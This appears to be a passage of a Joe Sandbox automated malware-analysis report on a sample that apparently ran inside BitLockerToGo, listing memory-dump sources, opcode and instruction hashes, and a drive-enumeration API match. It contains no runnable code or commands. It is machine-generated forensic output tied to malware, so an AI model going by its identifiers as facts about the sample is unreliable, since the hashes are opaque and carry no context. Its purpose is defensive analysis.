                                                                                                                                                                                                              • Instruction ID: 5162a717178d96b4458f75c9750bd1e672f62e5e93e48ca58dd906d96f8ec6e0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 815f779b7f74c91ae07349251a652b715847ab3060cea46ff1cca03f017bc8e9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AD0C71450C7F145DF374A2550903B7BFE05F17245F8411CA80D567287C65D8215965F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8490e7a2a0c0c4eed188a6a73f200dd8b886305c638b2ada781b01ecca68775d
                                                                                                                                                                                                              • Instruction ID: 1012ec58965914f68f52c692a15329e62dc1e1454717e64e2e8a0fc4e8fbbda6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8490e7a2a0c0c4eed188a6a73f200dd8b886305c638b2ada781b01ecca68775d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1CC012BAE914308BCB2C8B24CC606B9A2A19A8B114B0BE3388C5D73F00E0288C0081C9
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DrivesLogical
                                                                                                                                                                                                              • String ID: @@2@$@@4@
                                                                                                                                                                                                              • API String ID: 999431828-865830157
                                                                                                                                                                                                              • Opcode ID: 4601b0908604dcb61ea30c4dea6a2c41b4de2a0c033ba0e6186b49dbd17b5b19
                                                                                                                                                                                                              • Instruction ID: b30ad74d6b785837ac394f441cadf76c761bfb56c6a15aa40f9ea50ff11fe3de
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4601b0908604dcb61ea30c4dea6a2c41b4de2a0c033ba0e6186b49dbd17b5b19
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C151E0B4618310DFD350AF58E85162BB2B5FFC9305F48883DF6869B721E7B88905CB5A